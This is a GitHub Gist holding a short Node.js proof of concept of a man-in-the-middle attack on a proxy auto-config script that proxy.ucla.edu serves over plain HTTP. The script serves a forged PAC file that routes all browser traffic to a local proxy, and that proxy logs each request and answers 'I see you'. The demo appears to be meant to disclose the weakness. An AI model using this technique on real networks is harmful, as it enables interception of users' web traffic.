Created
January 11, 2021 00:20
-
-
Save rvighne/b6a6c19ba9396fa417fd819afaa0d9da to your computer and use it in GitHub Desktop.
Demo of man-in-the-middle attack against a proxy script loaded insecurely
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const http = require('http') | |
| // The malicious proxy configuration script | |
| // Replaces the real script | |
| // Directs all requests to malicious proxy server | |
| function FindProxyForURL(url, host) { | |
| return "PROXY ::1:8080"; | |
| } | |
| // The man in the middle | |
| // Intercepts requests to http://proxy.ucla.edu/cgi/proxy | |
| // To reproduce: add the line "::1 proxy.ucla.edu" to your hosts file | |
| http.createServer((req, res) => { | |
| console.log('sending fake script to', | |
| `${req.socket.remoteAddress}:${req.socket.remotePort}`) | |
| res.setHeader('Content-type', 'application/x-ns-proxy-autoconfig') | |
| res.end(FindProxyForURL.toString()) | |
| }).listen(80) | |
| // The malicious proxy server | |
| // Doesn't actually function as a proxy | |
| // Logs all requests and gives warning to user | |
| http.createServer((req, res) => { | |
| console.log('caught request for', req.url) | |
| res.setHeader('Content-type', 'text/plain') | |
| res.end('I see you') | |
| }).listen(8080) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment